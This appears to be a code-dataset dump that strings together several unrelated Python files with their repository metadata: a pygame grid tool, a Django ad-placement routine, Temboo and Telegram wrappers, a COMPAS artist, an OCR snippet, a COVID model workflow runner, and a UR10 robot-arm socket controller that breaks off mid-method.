new_color {list} -- The new color with which the the flooded fields should be colored in HSV
"""
if list(self.grid[x, y]) == old_color:
self.grid[x,y] = new_color
self._flood_fill(x, min(self.grid.shape[1]-1, y+1), old_color, new_color)
self._flood_fill(x, max(0, y-1), old_color, new_color)
self._flood_fill(min(self.grid.shape[0]-1, x+1), y, old_color, new_color)
self._flood_fill(max(0, x-1), y, old_color, new_color)
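# A minimal usage sketch of GridCreator in a pygame event loop. It assumes
# pygame and the PyEvolv assets are importable and that a "grids/" directory
# exists; the window size, grid shape and frame rate are illustrative values.
def _example_grid_creator_loop():
    pygame.init()
    screen = pygame.display.set_mode((800, 600))
    grid = np.zeros((50, 50, 3))                       # one HSV triple per tile
    creator = GridCreator(800, 600, grid, "grids/", relatives_on_screen=200)
    clock = pygame.time.Clock()
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            else:
                creator.controller(event)              # brush / grid / sidebar input
        creator.next_frame()                           # update sidebar and map surfaces
        screen.blit(creator.surf, (0, 0))
        pygame.display.flip()
        clock.tick(30)
    pygame.quit()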
| 142
| 9,016
| 23
|
69e1c7f030fdae6cc022477307bb6b668d3bc021
| 2,726
|
py
|
Python
|
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
#import util_preparation as up
import pandas as pd
import random
import os
import csv
from .models import *
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
| 29.956044
| 100
| 0.573001
|
#import util_preparation as up
import pandas as pd
import random
import os
import csv
from .models import *
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
def generagte_random_ads(video_id,N_ADS=3):
    # Decide which ads to insert
    # Available ads can be looked up in ad_urls.csv
ads = []
ads = [[ad.ad_id, ad.href, ad.src] for ad in Ad.objects.all() if ad.ad_id != 1]
# reader = csv.reader(open(r"/home/www/res/ad/ad_urls.csv", "r",encoding="utf8"))
# for item in reader:
# ad_id = int(item[0])
# ad_url = item[1]
# ads.append([ad_id, ad_url])
    # Randomly sample N_ADS of them
ads = random.sample(ads, N_ADS)
    # Decide the insertion times
    # Walk over all *_shot.csv files and find the one matching the current video
available_times = []
available_local_shot_ids = []
for path,dir_list,file_list in os.walk(r"/home/www/res/video_shot_csv"):
for file_name in file_list:
id = int(file_name.split("/")[-1].split("_")[0].replace("video",""))
video = Video.objects.get(video_id=video_id)
v_length = video.length
shots:Shot = Shot.objects.filter(video=video)
for shot in shots:
#start_time = float(item[START_TIME_COL])
end_time = shot.end_time
                # The end time of each shot can serve as a candidate insertion point
                # Time points too close to the start or the end (START/END_PREVENT_DURATION) are dropped automatically
if end_time > START_PREVENT_DURATION and end_time < v_length - END_PREVENT_DURATION:
available_times.append(end_time)
available_local_shot_ids.append(shot.local_shot_id)
def randomize_time():
ad_times = random.sample(available_times, N_ADS)
ad_times.sort()
for i in range(0,N_ADS):
if (i-1)>0:
if abs(ad_times[i] - ad_times[i-1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
if (i+1)<len(ad_times):
if abs(ad_times[i] - ad_times[i+1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
return ad_times
if len(available_times) > N_ADS:
ad_times = randomize_time()
#print(ad_times)
else:
#print("ERROR: len(available_times) <= N_ADS")
return []
local_shot_ids = []
for time in ad_times:
local_shot_ids.append(available_local_shot_ids[available_times.index(time)])
# print(ad_times)
result = []
for i in range(0, N_ADS):
result.append({
"ad_id":ads[i][0],
"time":ad_times[i],
"local_shot_id":local_shot_ids[i],
"href":ads[i][1],
"src":ads[i][2]
})
#print(result)
return result
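# A minimal usage sketch, assuming the Django app is configured and a Video row
# with this id (plus its Shot rows and at least three Ad rows) exists in the
# database; video_id=1 is an illustrative value only.
def example_pick_ads_for_video(video_id=1):
    placements = generagte_random_ads(video_id, N_ADS=3)
    for p in placements:
        # Each placement carries the ad id, the insertion time in seconds, the
        # local shot id it follows, and the ad's link/source URLs.
        print(p["ad_id"], p["time"], p["local_shot_id"], p["href"], p["src"])
    return placements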
| 2,662
| 0
| 23
|
5f7d6c5925fe4e52b86831fe3e20e0cbb51570a3
| 4,646
|
py
|
Python
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ZipFileInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ZipFile
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
super(ZipFileInputSet, self)._set_input('AccessToken', value)
def set_AsUser(self, value):
"""
Set the value of the AsUser input for this Choreo. ((optional, string) The ID of the user. Only used for enterprise administrators to make API calls for their managed users.)
"""
super(ZipFileInputSet, self)._set_input('AsUser', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to zip.)
"""
super(ZipFileInputSet, self)._set_input('FileID', value)
def set_SharedLink(self, value):
"""
        Set the value of the SharedLink input for this Choreo. ((conditional, json) A JSON object representing the item's shared link and associated permissions. See documentation for formatting examples.)
"""
super(ZipFileInputSet, self)._set_input('SharedLink', value)
def set_ZipFileLocation(self, value):
"""
Set the value of the ZipFileLocation input for this Choreo. ((conditional, string) The id of the folder to put the new zip file in. When not specified, the zip file will be put in the root folder.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileLocation', value)
def set_ZipFileName(self, value):
"""
Set the value of the ZipFileName input for this Choreo. ((required, string) The name of the zip file that will be created.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileName', value)
class ZipFileResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ZipFile Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((string) The response from Box. This contains the newly created zip file metadata.)
"""
return self._output.get('Response', None)
def get_URL(self):
"""
Retrieve the value for the "URL" output from this Choreo execution. ((string) The url for the newly created zip file.)
"""
return self._output.get('URL', None)
| 40.754386
| 206
| 0.674774
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ZipFile(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ZipFile Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ZipFile, self).__init__(temboo_session, '/Library/Box/Files/ZipFile')
def new_input_set(self):
return ZipFileInputSet()
def _make_result_set(self, result, path):
return ZipFileResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ZipFileChoreographyExecution(session, exec_id, path)
class ZipFileInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ZipFile
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
super(ZipFileInputSet, self)._set_input('AccessToken', value)
def set_AsUser(self, value):
"""
Set the value of the AsUser input for this Choreo. ((optional, string) The ID of the user. Only used for enterprise administrators to make API calls for their managed users.)
"""
super(ZipFileInputSet, self)._set_input('AsUser', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to zip.)
"""
super(ZipFileInputSet, self)._set_input('FileID', value)
def set_SharedLink(self, value):
"""
        Set the value of the SharedLink input for this Choreo. ((conditional, json) A JSON object representing the item's shared link and associated permissions. See documentation for formatting examples.)
"""
super(ZipFileInputSet, self)._set_input('SharedLink', value)
def set_ZipFileLocation(self, value):
"""
Set the value of the ZipFileLocation input for this Choreo. ((conditional, string) The id of the folder to put the new zip file in. When not specified, the zip file will be put in the root folder.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileLocation', value)
def set_ZipFileName(self, value):
"""
Set the value of the ZipFileName input for this Choreo. ((required, string) The name of the zip file that will be created.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileName', value)
class ZipFileResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ZipFile Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((string) The response from Box. This contains the newly created zip file metadata.)
"""
return self._output.get('Response', None)
def get_URL(self):
"""
Retrieve the value for the "URL" output from this Choreo execution. ((string) The url for the newly created zip file.)
"""
return self._output.get('URL', None)
class ZipFileChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ZipFileResultSet(response, path)
| 312
| 424
| 100
|
2374e49774cc023c7ed6620b6560ab93b1236fd8
| 1,009
|
py
|
Python
|
telegram_addons/conversationhandlerext.py
|
LaFa777/python-telegram-bot-addons
|
55c48ada4c83df2b2ec75f00e819f8928149f8cd
|
[
"Apache-2.0"
] | null | null | null |
telegram_addons/conversationhandlerext.py
|
LaFa777/python-telegram-bot-addons
|
55c48ada4c83df2b2ec75f00e819f8928149f8cd
|
[
"Apache-2.0"
] | null | null | null |
telegram_addons/conversationhandlerext.py
|
LaFa777/python-telegram-bot-addons
|
55c48ada4c83df2b2ec75f00e819f8928149f8cd
|
[
"Apache-2.0"
] | null | null | null |
from telegram.ext import ConversationHandler
class ConversationHandlerExt(ConversationHandler):
"""Расширяет оригинальный :class:`telegram.ext.ConversationHandler` возможностью вручную
установить `state`. Переопределяет конструктор, теперь обязателен только 1 параметр (states).
"""
def set_state(self, update, state):
"""Устанавливает переданный state.
"""
        # check that the given state actually exists
if state not in self.states.keys() and state != self.END:
raise ValueError(
"state=\"{}\" not exist in current ConversationHandlerExt".format(state))
key = self._get_key(update)
self.update_state(state, key)
| 32.548387
| 97
| 0.622398
|
from telegram.ext import ConversationHandler
class ConversationHandlerExt(ConversationHandler):
"""Расширяет оригинальный :class:`telegram.ext.ConversationHandler` возможностью вручную
установить `state`. Переопределяет конструктор, теперь обязателен только 1 параметр (states).
"""
def __init__(self,
states,
**kwargs):
if 'entry_points' not in kwargs:
kwargs["entry_points"] = []
if 'fallbacks' not in kwargs:
kwargs["fallbacks"] = []
kwargs["states"] = states
super().__init__(**kwargs)
def set_state(self, update, state):
"""Устанавливает переданный state.
"""
        # check that the given state actually exists
if state not in self.states.keys() and state != self.END:
raise ValueError(
"state=\"{}\" not exist in current ConversationHandlerExt".format(state))
key = self._get_key(update)
self.update_state(state, key)
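# A minimal usage sketch, assuming python-telegram-bot's handler API
# (CommandHandler / MessageHandler / Filters); the state value and the callback
# bodies below are placeholders for a real bot's conversation logic.
def example_build_conversation():
    from telegram.ext import CommandHandler, MessageHandler, Filters

    MENU = 0

    def start(update, context):
        update.message.reply_text("Main menu")
        conv.set_state(update, MENU)     # manually jump the conversation to MENU

    def echo(update, context):
        update.message.reply_text(update.message.text)

    conv = ConversationHandlerExt(
        states={MENU: [MessageHandler(Filters.text, echo)]},
        entry_points=[CommandHandler("start", start)],
    )
    return conv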
| 277
| 0
| 27
|
68408fe7a5c1690df451641f4565f48305c8e19c
| 830
|
py
|
Python
|
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_ghpython
from compas.artists import PrimitiveArtist
from .artist import GHArtist
class PointArtist(GHArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
"""
def draw(self):
"""Draw the point.
Returns
-------
:class:`Rhino.Geometry.Point3d`
"""
points = [self._get_args(self.primitive)]
return compas_ghpython.draw_points(points)[0]
    @staticmethod
    def _get_args(primitive):
        return {'pos': list(primitive)}
| 23.714286
| 68
| 0.659036
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_ghpython
from compas.artists import PrimitiveArtist
from .artist import GHArtist
class PointArtist(GHArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
"""
def __init__(self, point, **kwargs):
super(PointArtist, self).__init__(primitive=point, **kwargs)
def draw(self):
"""Draw the point.
Returns
-------
:class:`Rhino.Geometry.Point3d`
"""
points = [self._get_args(self.primitive)]
return compas_ghpython.draw_points(points)[0]
@staticmethod
def _get_args(primitive):
return {'pos': list(primitive)}
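# A minimal usage sketch, assuming a Grasshopper/GHPython environment in which
# compas_ghpython can draw Rhino geometry; the coordinates are illustrative.
def example_draw_point():
    from compas.geometry import Point
    artist = PointArtist(Point(1.0, 2.0, 3.0))
    return artist.draw()    # a Rhino.Geometry.Point3d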
| 128
| 0
| 53
|
9ec102cb665e7539c5fa44c0ec648ab7542b5df8
| 167
|
py
|
Python
|
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
| 20.875
| 41
| 0.760479
|
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
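# If the tesseract binary is not on the PATH, pytesseract can be pointed at it
# explicitly (after `import pytesseract`); the path below is a placeholder for
# the local install location.
# pytesseract.pytesseract.tesseract_cmd = r"/usr/local/bin/tesseract"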
| 0
| 0
| 0
|
ba109537d1c09b462c5c8821fa653a5b7cfb8c0a
| 2,744
|
py
|
Python
|
covid19-etl/etl/bayes_model_workflow.py
|
West-Loop-Strategy/covid19-tools
|
a8f30c97fbc5d4e775003fea95cb57f5df88332a
|
[
"Apache-2.0"
] | null | null | null |
covid19-etl/etl/bayes_model_workflow.py
|
West-Loop-Strategy/covid19-tools
|
a8f30c97fbc5d4e775003fea95cb57f5df88332a
|
[
"Apache-2.0"
] | null | null | null |
covid19-etl/etl/bayes_model_workflow.py
|
West-Loop-Strategy/covid19-tools
|
a8f30c97fbc5d4e775003fea95cb57f5df88332a
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
import requests
import time
from etl import base
from utils.fence_helper import get_api_key, get_access_token
| 39.768116
| 114
| 0.622449
|
from datetime import datetime
import requests
import time
from etl import base
from utils.fence_helper import get_api_key, get_access_token
class BAYES_MODEL_WORKFLOW(base.BaseETL):
def __init__(self, base_url, access_token, s3_bucket):
super().__init__(base_url, access_token, s3_bucket)
self.headers = {"Authorization": f"Bearer {access_token}"}
self.api_key = None
self.model_version = "v3.2"
self.status_ping_minutes = 10
def get_status(self, run_id):
url = f"{self.base_url}/ga4gh/wes/v1/runs/{run_id}/status"
r = requests.get(url, headers=self.headers)
if r.status_code == 403:
print(
"Got a 403, token might have expired. Getting a new token and retrying"
)
new_access_token = get_access_token(self.base_url, self.api_key)
self.headers = {"Authorization": f"Bearer {new_access_token}"}
r = requests.get(url, headers=self.headers)
assert (
r.status_code == 200
), f"Could not get run status from Mariner ({r.status_code}):\n{r.text}"
resp_data = r.json()
if not resp_data or "status" not in resp_data:
# Mariner did not return a status - that happens right after the
# job is created. It might take a few seconds to start the run.
# For now, assume the status is "not-started"
return "not-started"
return resp_data["status"]
def files_to_submissions(self):
        self.api_key = get_api_key(self.base_url, headers=self.headers)
print("Preparing request body")
url = f"https://raw.githubusercontent.com/uc-cdis/covid19model/{self.model_version}/cwl/request_body.json"
r = requests.get(url)
assert r.status_code == 200, f"Could not get request body from {url}"
request_body = r.json()
request_body["input"]["s3_bucket"] = f"s3://{self.s3_bucket}"
print("Starting workflow run")
url = f"{self.base_url}/ga4gh/wes/v1/runs"
r = requests.post(url, json=request_body, headers=self.headers)
assert (
r.status_code == 200
), f"Could not start Mariner workflow ({r.status_code}):\n{r.text}"
resp_data = r.json()
assert (
resp_data and "runID" in resp_data
), f"Mariner did not return a runID:\n{resp_data}"
run_id = resp_data["runID"]
print(f"Monitoring workflow run (run ID: {run_id})")
status = "running"
while status in ["not-started", "running", "unknown"]:
status = self.get_status(run_id)
print(f" [{datetime.now()}] status: {status}")
time.sleep(60 * self.status_ping_minutes)
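# A minimal usage sketch; the commons URL, access token and bucket name are
# placeholders, and a reachable Gen3/Mariner deployment plus valid credentials
# are assumed.
def example_run_bayes_workflow():
    etl_job = BAYES_MODEL_WORKFLOW(
        base_url="https://example-commons.org",
        access_token="ACCESS_TOKEN",
        s3_bucket="example-model-bucket",
    )
    # Submits the workflow run to Mariner and polls its status every
    # status_ping_minutes until it leaves the running states.
    etl_job.files_to_submissions()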
| 2,479
| 20
| 103
|
5e646af002eec7affa6c340d69f3649382ec6a9a
| 17,625
|
py
|
Python
|
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
import socket
import numpy as np
from ur10_simulation import ur10_simulator
import time
import struct
import binascii
from copy import copy
import os.path
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
#MANAGING POSES (POSITIONS OR JOINTS)
#save pose file
#filename should contain the full path for the file
#load pose file
#filename should contain the full path for the file
#move the UR robot to the specified pose
#get pose names
#get the joint position
#adding a new position
#WARNING: Adding a new position with the same name will overwrite any
#previous entry
#WARNING: position should be in m!!
#WARNING: joints should be in radians!!
#adding a new joint
#WARNING: Adding a new joint with the same name will overwrite any
#previous entry
#WARNING: joints should be in radians!!
#removing a position/joint
#this function remaps all the positions that have been saved to a new
#home position. necessary when remapping has changed. as long as it is
#possible to create positions relative to an origin or home position, this
#method can be used to convert all the stored positions to new values
#based on a new origin
#def conv2newHome(self,_home):
# print('ok')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import os,sys
sys.path.append('../iLimb')
from iLimb import *
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
| 31.756757
| 198
| 0.549787
|
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
import socket
import numpy as np
from ur10_simulation import ur10_simulator
import time
import struct
import binascii
from copy import copy
import os.path
#-------------------------------------------------------------------------------
class UR10Controller:
def __init__(self, ip,port_recv = 30003, port_send=30002, buffer_size=1024):
self.port_send = port_send
self.port_recv = port_recv
self.ip = ip
self.buffer_size = buffer_size
self.joints = np.zeros((6))
self.xyzR = np.zeros((6))
self.timer_start = time.time()
self.connect()
self.read_start = copy(self.read_time())
self.read_timer = 0
def connect(self):
self.urcont_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_send.connect((self.ip,self.port_send))
self.urcont_recv.connect((self.ip,self.port_recv))
def disconnect(self):
self.urcont_send.close()
def read_time(self):
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(1048)
Time = self.get_xyzR(packet_2)
return Time
def movej(self,posevec,t):
X = 0.001*posevec[0]
Y = 0.001*posevec[1]
Z = 0.001*posevec[2]
Rx = posevec[3]
Ry = posevec[4]
Rz = posevec[5]
cmd = "movej(p[" + str(X) + "," + str(Y) + "," + str(Z) + "," + str(Rx) + "," + str(Ry) + "," + str(Rz) + "], t =" + str(t) + ")\n"
# print(cmd)
# a = input("")
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def movejoint(self,jointvec,t):
cmd = "movej([" + str(jointvec[0]) + "," + str(jointvec[1]) + "," + str(jointvec[2]) + "," + str(jointvec[3]) + "," + str(jointvec[4]) + "," + str(jointvec[5]) + "], t =" + str(t) + ") \n"
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def stopj(self,a = 2):
cmd = "stopj(" + str(a) + ")"
self.urcont_send.send(cmd)
def clear_buffer(self):
#t1 = time.time()
self.timer_current = copy(time.time()) - self.timer_start
t1 = time.time()
while 1:
time.sleep(0.00001)
T = self.read_time()
self.read_timer = T - self.read_start
if self.timer_current - self.read_timer <0.05:
break
#t2 = time.time() - t1
def read_xyz(self):
#time.sleep(0.05)
self.clear_buffer()
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
packet_8 = self.urcont_recv.recv(48)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i<3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def get_joint(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y * (180.0/3.1419)
return val
def get_xyzR(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y
return val
def read_joints(self):
t1 = time.time()
self.clear_buffer()
print("Time to learn",time.time() - t1)
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
useless = self.urcont_recv.recv(760)
def read_joints_and_xyzR(self):
self.clear_buffer()
# time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i < 3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def move_joint_with_constraints(self, joints_vec, dist_pivot):
#joints_vec is in degrees
# self.read_joints_and_xyzR()
